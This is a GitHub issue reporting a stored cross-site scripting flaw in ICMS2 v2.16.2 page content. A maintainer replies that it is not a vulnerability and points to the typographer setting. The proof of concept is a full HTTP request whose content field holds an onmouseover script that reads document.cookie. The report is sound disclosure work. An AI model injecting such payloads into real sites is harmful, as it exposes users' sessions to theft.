search

instantsoft / icms2

Self-hosted Site Management System
https://instantcms.ru
GNU General Public License v2.0
295 stars 119 forks source link

Cross Site Scripting in Page Content #1487

Closed sahildari closed 9 months ago

sahildari commented 9 months ago

I found cross site scripting on the ICMS2 v 2.16.2 in the page content. I tried to report it via https://huntr.dev but was unable to do so. So I wanted to report it to you directly.

Description

XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Proof of Concept

Video POC

POST /icms2-2.16.2/pages/add HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------38911908221886912813993829425
Content-Length: 1267
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/icms2-2.16.2/pages/add
Cookie: ICMS65939A02407AE=96b80f1rcli1jite9uomcsv1gd; icms[device_type]=desktop; icms[guest_date_log]=1704172417; PHPSESSID=59d44rvcfcftvlt2fptds4fklm; icms[users_tree_path]=%2F0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="csrf_token"

a530434ba49ce4e7eca39e24e48abda6ba81d51acd27bd1b98261bd20395471d
-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="title"

xss1
-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="content"

<h1 onmouseover=confirm(document.cookie)>this is a demo xss page</h1>
-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="attach"; filename=""
Content-Type: application/octet-stream

-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="attach"

-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="slug"

xss1
-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="is_private"

0
-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="is_pub"

1
-----------------------------38911908221886912813993829425
Content-Disposition: form-data; name="submit"

Save
-----------------------------38911908221886912813993829425--
fuzegit commented 9 months ago

It is not a vulnerability. Enable typographer in the field settings.

Выделение_084

I don't know why huntr.dev won't let you add a report